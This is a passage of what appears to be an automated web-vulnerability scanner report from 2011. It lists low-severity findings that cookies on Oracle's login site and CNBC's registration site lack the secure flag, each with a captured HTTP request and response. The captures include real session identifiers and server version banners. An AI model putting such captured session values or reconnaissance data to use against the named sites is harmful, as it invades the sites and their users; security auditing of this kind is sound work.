HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:16:28 GMTSet-Cookie: OAM_REQ=VERSION_4~8sDFSRHdibovgCmaA9kyeOsOvdSrurh9%2fYsDnUk2jlujlceQtRW%2fQNi%2flXtkj%2f1SgeTckB5GdKb4Hiz%2bcaNwewyERD7QcMRgfrRpVp90TY8%2bnYtDCyQML4cbcIJSBTocN%2bEcyowHjAV4T8IiI3ws7mDtrHQycjFS%2b95QII460g3qoNhW5NtfCCWtvEZPMmVBwHPgvUl5YR43OwJgq%2bgde0LQEam8lbD94jp4S6QIQXKKWPHI0shq11UCzQp5aTviul4GjqyWIuFn07nRX3c7G%2b8HAXNSYggrFqjg7N9UUmqwIfpGSKgxVQm2tlsyhx2lF5%2fX0znmI0CGPxx4YQVTl%2bytRrRVXkWsJKWAVC2FzkHt20rPSUn7Rzo%2bMTr39tUdbEwX6W8hNO2IrkJvXMMcG4bTMjA%2flK%2f4eDDKQ%2br%2f1adGjvQ2WW%2bXBGu1QE7ISAHAcp%2bIbTzC3qDrRlaOZfhk97Y08zoNSgWTBsG12KJsu03sFdYO857KTadQANWaeWqdu2Q2BUUGt%2fbNAg%2fENILYpeVU4d86XheiVhTMYekWWDmFlAWs0DYAM%2fCQK2ZXKVW7YTNKyMvHX1HQ2l4F5f%2bD6JGo%2f4Ry2rQnRq7GyVJ%2bzJQtF6jmJoT%2bzGRiv%2fNNNbbC31fjTRiLatV9yBVhBxppHWhW6bCA6QYsp5V74BcWmdtWQhbfiEnKZ3UmOb%2fCy1sG%2frCk%2fnPRs3cvRcBogNG7wow5PNoRfPVOUWXc7usXNYWVgHDEX%2fHWsui%2f4QTdBvYq%2ft2HetL6iIJD9WZ8jNh%2blmJa3smPgzYT9gacAilyIHHONowOlZ%2bcURiBuvAb7MvZxw9FgzeFFRCTo6x2xnhWElY4HbK7QFkICQ30JqYfGsrCQ8MDGbZGiAbZ46PvOXPiieaTuZc5UIc1bCKdSV1jOhoXiKS%2bwpAoSfC%2fe85ishtCItS6D9QwAU%2b6loe3DgvK4n71PHvaEEvoDHmJRu7cBud9m6v1ZVrhfxyTRXFlYRFNNuqkYAUxr7%2btX%2beHeWSxzLnrsRku1QxjbO9KosKHSaLFViJbMvbUqdCJO47kYlWlO1yUUjPaovy7hybBAbZv2lIBBYVBFi9AkrWVySFrl%2blnuYi%2f7VefR27D8%2fNlHuzS3d0uQp54NDsb3w0CM2d0ZEgF261aZjlrZDv7QPzW5%2fjv47uJUdUyzIIsrD%2fpO4WqefIJZkNbDUIiN4%2fU3MdciWfJk9ZyPeIuj4Z4SIQnGof8Zqf5FpE7YLidXdna2kuPrj9%2bWvOIEl0O6xE87fUHG83cMhqWltQTxdLcr7vm0KmM5n%2bc76Z0YYdmjqH48rlxK5HgZx%2bcLO0qjpOhfgGYsm%2blpKve%2bwUGhiGwuhvSfrI1RCpOeYzZT4Ow%2b7u5rIP2Z9n8CFs7YylZLN1thygm8RmyQw5PuTblocl9AFFvgH3MExec2L3WC0ymRApmsstEbF2Y%2bmnBtTbxMot3ZXMcfN9Aruj3T%2b%2b7D8u2Zv%2ffBdVt5qG3QItonF3FaFRiJ9QfIkvCT2vlYPQbI8jrJ5lqWqqYuyTS6DQdIJsSun1bXFZwksK9WdxHJGkOzAs3tM46h%2bhk9GQBqLceWigyZCuwHPI%2bHUUAq3a3j3jKLvi6eS5ZWrCxGXLqnsFSGQUWP7fElxGN35xwbvqMqetKjqX5VPTvDM4DINi0R1eoL5Xy8JofGj%2f1iEBuChkCDaSwb6sU%2b3ozVy4teWDpKd2ingo72r3r%2fM0rCvbbRfGlsN91sA%3d%3d; path=/; HttpOnly X-ORACLE-DMS-ECID: 0000J8zXg116uHK6EVADUS1EHWFB01taYd X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:16:28 GMT; path=/ Content-Length: 2359 <html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
7.35. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/pls/orasso/orasso.wwsso_app_admin.ls_login
Issue detail
The following cookies were issued by the application and do not have the secure flag set:OAM_REQ=VERSION_4~1UuUhb3VlJjpjbcfM%2bCo%2b%2bMiWJ2ThT1j0zV2GIRgsiVXHKq1wWviikzjAmSMNpHcxw1rhPxnndOe6siHyjxtbEM%2buYuUn%2bUvYKd01%2bdN5qmbCefoBjLXOdBrDbalBGhTFH1mcenZ6VQcZOtiYN8%2b2RhWlQVpI0kTgRyqGG40EECD4CxAU4gDEYcZmI2B3wNkljoMdwVuaGWnut3Ws3E5AmamcNRVrdECimq1Mq%2f26%2bWfrUnoqmsx7kxOsJNewr%2bnbiYvS6wDHfxOtJWhU9pUItq8bUkoQwr7H5isBCh5meyvKe8ms68i55w4CahCTz3p6A01AM2dYBzGmRORCv6MqWPBKK5rVQPutfIo4HtNsfY2j5bm56F%2fzt94BzXXWxxsIhITfd%2b5we89fEJFZ2CTJgrZuXFNGB8jvQYx1YE6%2b7ASPoQu6ptzJ7jgdMAcNsxu50KMjCTA9dS18y7RfMmioWGVZaXuiTS26UzYRBWtMqgP6BhdQZSlRcjTcuc46NN8nrnPWOZL4K3h0yZI3vi8mV4sFUAHB2aS%2fObCAYn0yTQ3hhne5ezNrHo%2bH9c64NxLbPfw7eZU0b%2b4HhsFiPrF8I3JW0kUOq2JgvMJfMrL2huNN1Zpg%2bCEZraUo1TgPJ0143QFgYSJe1eczDw2MyCnfK3oh6Qtd7KYCYZqmx2UGJZqdGMHwEYjBtChCnZ%2bAYXC52A7T7BfE9%2bsU5UIViqxLMgLQufDXehYMfsh5xmRetJCVQjKlYhNt7oMAXSuo9O2k7OMGli%2fN4scZh0Pzed3GEjYCczp0U22FIrQ0m%2f%2bmzDHuyeEtas2vlW6JqELbY%2fxow1EezrQ%2bGYJaUxmUmB0yGsjb2F1Rp7CJPqKBgfXUpG7wnI326ZeV6pmgG9tMIY562dx0jU2RAMPJ1RgtCLRBoiQfe5PC4CVl2COVV%2fQGPEJ08Ey9H8gUzMJnEcE45wTXctneFvp7B%2bb%2fqrgJErqrGicSt5dbvcFIsmoCMx7XapdWZKlBi1mu98HJYyULu6G89uz7J7F1OUfVHXvohzzOrSr%2becHY4ndhIRFBwY5sSgv%2bNzfUhO9kDgCTx%2bkyBXZS4ENTxntnbFbXdYwDRUy3ced%2bRD1gv6b5Z1m46L2ASxzktwc8%2ft6h2e%2fZddmlbvJWSuAKXOVJnZPHeqq52brL9R2gKGGj8BrRjerqgBbjDog3QbuqH%2fVAGSNF0SzQwxZUJ6%2bWrNxH4KdRN3jYQrSX8x8LET%2fNACGe9jkZHVZWQKO6%2bAYVadrfVlSSL%2fxDUaDg6rdboxh8xYhMFUB1iAtoS0tCXjvv8L7w3iNda8ERdiiOKy%2bzqxzLqwOti%2bDPDfBmzK%2fPqcoG4eKrU2QS0uiJhNKc1LBvRBAcEjEA6JPJyO7fKHt9Cm61%2bSMW0H4YGmgW1TDtuQ81K00oZc%2bvp8PB%2f5uw3pu3y%2bMHs5TOOFMQv3Ndu%2b6mY%2bqO4nzv3w6U6u8b08hyFm08mgiATuuPlAlRk03u%2bjPRx2hAvWC8poLvKtS0wKaWl8DTa79BTB7DLE8gKChrkaHA2PeautfHjr5C7tfyfsR4L%2fPbtHU2Ei28ge9mNEOIcqrE5h53SVtUecGk51ABEcw%2bu%2f5cvPKa%2frIBDaoUQChQjGIrYSm1J8qODITQ2AJoAe%2fULjYYDVDNM9Mso54mrVWl%2fTy3IZhZNmrS0J5kUhi9G7LHhiUKSx7Y%2fC%2bSPs%2fgVaAtG2nE93v6Y%2b3XHD8w%2fvIU6%2fjajSgqSI5oTv%2bgjlFIUeIzqAc%2fJkSJ%2b8Im1uaWQrVWrz8LjrbXglHGh4%2fdkgqoMYyj85f5xa%2f0NxgBcbU%2bceGpsINAzmIfwo%3d; path=/; HttpOnly BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357 HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:13 GMTSet-Cookie: OAM_REQ=VERSION_4~1UuUhb3VlJjpjbcfM%2bCo%2b%2bMiWJ2ThT1j0zV2GIRgsiVXHKq1wWviikzjAmSMNpHcxw1rhPxnndOe6siHyjxtbEM%2buYuUn%2bUvYKd01%2bdN5qmbCefoBjLXOdBrDbalBGhTFH1mcenZ6VQcZOtiYN8%2b2RhWlQVpI0kTgRyqGG40EECD4CxAU4gDEYcZmI2B3wNkljoMdwVuaGWnut3Ws3E5AmamcNRVrdECimq1Mq%2f26%2bWfrUnoqmsx7kxOsJNewr%2bnbiYvS6wDHfxOtJWhU9pUItq8bUkoQwr7H5isBCh5meyvKe8ms68i55w4CahCTz3p6A01AM2dYBzGmRORCv6MqWPBKK5rVQPutfIo4HtNsfY2j5bm56F%2fzt94BzXXWxxsIhITfd%2b5we89fEJFZ2CTJgrZuXFNGB8jvQYx1YE6%2b7ASPoQu6ptzJ7jgdMAcNsxu50KMjCTA9dS18y7RfMmioWGVZaXuiTS26UzYRBWtMqgP6BhdQZSlRcjTcuc46NN8nrnPWOZL4K3h0yZI3vi8mV4sFUAHB2aS%2fObCAYn0yTQ3hhne5ezNrHo%2bH9c64NxLbPfw7eZU0b%2b4HhsFiPrF8I3JW0kUOq2JgvMJfMrL2huNN1Zpg%2bCEZraUo1TgPJ0143QFgYSJe1eczDw2MyCnfK3oh6Qtd7KYCYZqmx2UGJZqdGMHwEYjBtChCnZ%2bAYXC52A7T7BfE9%2bsU5UIViqxLMgLQufDXehYMfsh5xmRetJCVQjKlYhNt7oMAXSuo9O2k7OMGli%2fN4scZh0Pzed3GEjYCczp0U22FIrQ0m%2f%2bmzDHuyeEtas2vlW6JqELbY%2fxow1EezrQ%2bGYJaUxmUmB0yGsjb2F1Rp7CJPqKBgfXUpG7wnI326ZeV6pmgG9tMIY562dx0jU2RAMPJ1RgtCLRBoiQfe5PC4CVl2COVV%2fQGPEJ08Ey9H8gUzMJnEcE45wTXctneFvp7B%2bb%2fqrgJErqrGicSt5dbvcFIsmoCMx7XapdWZKlBi1mu98HJYyULu6G89uz7J7F1OUfVHXvohzzOrSr%2becHY4ndhIRFBwY5sSgv%2bNzfUhO9kDgCTx%2bkyBXZS4ENTxntnbFbXdYwDRUy3ced%2bRD1gv6b5Z1m46L2ASxzktwc8%2ft6h2e%2fZddmlbvJWSuAKXOVJnZPHeqq52brL9R2gKGGj8BrRjerqgBbjDog3QbuqH%2fVAGSNF0SzQwxZUJ6%2bWrNxH4KdRN3jYQrSX8x8LET%2fNACGe9jkZHVZWQKO6%2bAYVadrfVlSSL%2fxDUaDg6rdboxh8xYhMFUB1iAtoS0tCXjvv8L7w3iNda8ERdiiOKy%2bzqxzLqwOti%2bDPDfBmzK%2fPqcoG4eKrU2QS0uiJhNKc1LBvRBAcEjEA6JPJyO7fKHt9Cm61%2bSMW0H4YGmgW1TDtuQ81K00oZc%2bvp8PB%2f5uw3pu3y%2bMHs5TOOFMQv3Ndu%2b6mY%2bqO4nzv3w6U6u8b08hyFm08mgiATuuPlAlRk03u%2bjPRx2hAvWC8poLvKtS0wKaWl8DTa79BTB7DLE8gKChrkaHA2PeautfHjr5C7tfyfsR4L%2fPbtHU2Ei28ge9mNEOIcqrE5h53SVtUecGk51ABEcw%2bu%2f5cvPKa%2frIBDaoUQChQjGIrYSm1J8qODITQ2AJoAe%2fULjYYDVDNM9Mso54mrVWl%2fTy3IZhZNmrS0J5kUhi9G7LHhiUKSx7Y%2fC%2bSPs%2fgVaAtG2nE93v6Y%2b3XHD8w%2fvIU6%2fjajSgqSI5oTv%2bgjlFIUeIzqAc%2fJkSJ%2b8Im1uaWQrVWrz8LjrbXglHGh4%2fdkgqoMYyj85f5xa%2f0NxgBcbU%2bceGpsINAzmIfwo%3d; path=/; HttpOnly X-ORACLE-DMS-ECID: 0000J8zXBDg6uHK6EVADUS1EHWFB01t_b1 X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/ Content-Length: 3286 <html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
7.36. https://register.cnbc.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:43 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Thu, 13 Aug 2009 22:54:28 GMT ETag: "3b-4710dd15eb100" Accept-Ranges: bytes Content-Length: 59 Connection: close Content-Type: text/htmlSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ <script> window.location="http://www.cnbc.com"; </script>
7.37. https://register.cnbc.com/RandomImage.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/RandomImage.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RandomImage.jsp HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:40 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/htmlSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ Content-Length: 2261 ......JFIF.............C........... . ................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......2....".................................[SNIP]...
7.38. https://register.cnbc.com/cas
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/cas
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:44 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:05:44 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 201 Connection: close Content-Type: text/html; charset=iso-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:44 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /cas was not found on this server.</p> </body></html>...[SNIP]...
7.39. https://register.cnbc.com/checkemail.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/checkemail.do
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkemail.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:46 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 231 Connection: close Content-Type: text/xml;charset=ISO-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/ <?xml version="1.0" encoding="ISO-8859-1"?> <response> <status>FAILURE</status> <description>Email Address is required</description> <timestamp>Tue Sep 06 11:05:46 EDT 2011</timestamp...[SNIP]...
7.40. https://register.cnbc.com/checkpassword.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/checkpassword.do
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkpassword.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:46 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 226 Connection: close Content-Type: text/xml;charset=ISO-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/ <?xml version="1.0" encoding="ISO-8859-1"?> <response> <status>FAILURE</status> <description>Password is required</description> <timestamp>Tue Sep 06 11:05:46 EDT 2011</timestamp> ...[SNIP]...
7.41. https://register.cnbc.com/checkscreenname.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/checkscreenname.do
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkscreenname.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:47 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 227 Connection: close Content-Type: text/xml;charset=ISO-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/ <?xml version="1.0" encoding="ISO-8859-1"?> <response> <status>FAILURE</status> <description>User name is required</description> <timestamp>Tue Sep 06 11:05:47 EDT 2011</timestamp> ...[SNIP]...
7.42. https://register.cnbc.com/checkzipcode.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/checkzipcode.do
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkzipcode.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:47 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 226 Connection: close Content-Type: text/xml;charset=ISO-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/ <?xml version="1.0" encoding="ISO-8859-1"?> <response> <status>FAILURE</status> <description>Zip Code is required</description> <timestamp>Tue Sep 06 11:05:47 EDT 2011</timestamp> ...[SNIP]...
7.43. https://register.cnbc.com/createUser.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/createUser.do
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:45 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /createUser.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:45 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html;charset=UTF-8Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:45 GMT; path=/ Content-Length: 54215 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Ty...[SNIP]...
7.44. https://register.cnbc.com/css/forgotPassword.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/css/forgotPassword.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/forgotPassword.css HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:49 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Mon, 01 Jun 2009 14:04:23 GMT ETag: "415-46b49e73a87c0" Accept-Ranges: bytes Content-Length: 1045 Connection: close Content-Type: text/cssSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ div{} .headerImage{margin-top:5px} .mainContent{width:970px;padding:0px;} .mainContent .heading{font-family:Arial;font-size:16;font-weight:bold;color:#2D648A;margin-bottom:20px;margin-top:40px;margin-...[SNIP]...
7.45. https://register.cnbc.com/css/member_center_sytles.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/css/member_center_sytles.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/member_center_sytles.css HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
